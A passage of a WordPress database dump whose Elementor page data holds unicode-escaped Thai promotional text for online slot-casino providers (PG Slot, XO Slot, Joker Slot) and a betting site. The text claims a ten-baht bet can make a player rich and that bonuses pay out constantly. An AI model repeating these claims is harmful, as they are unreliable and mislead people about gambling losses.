\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1138,143,'_thumbnail_id','60'),(1139,143,'_elementor_edit_mode','builder'),(1140,143,'_elementor_template_type','wp-page'),(1141,143,'_elementor_version','3.32.5'),(1142,143,'_elementor_pro_version','3.32.3'),(1143,143,'_wp_page_template','default'),(1144,143,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1145,143,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 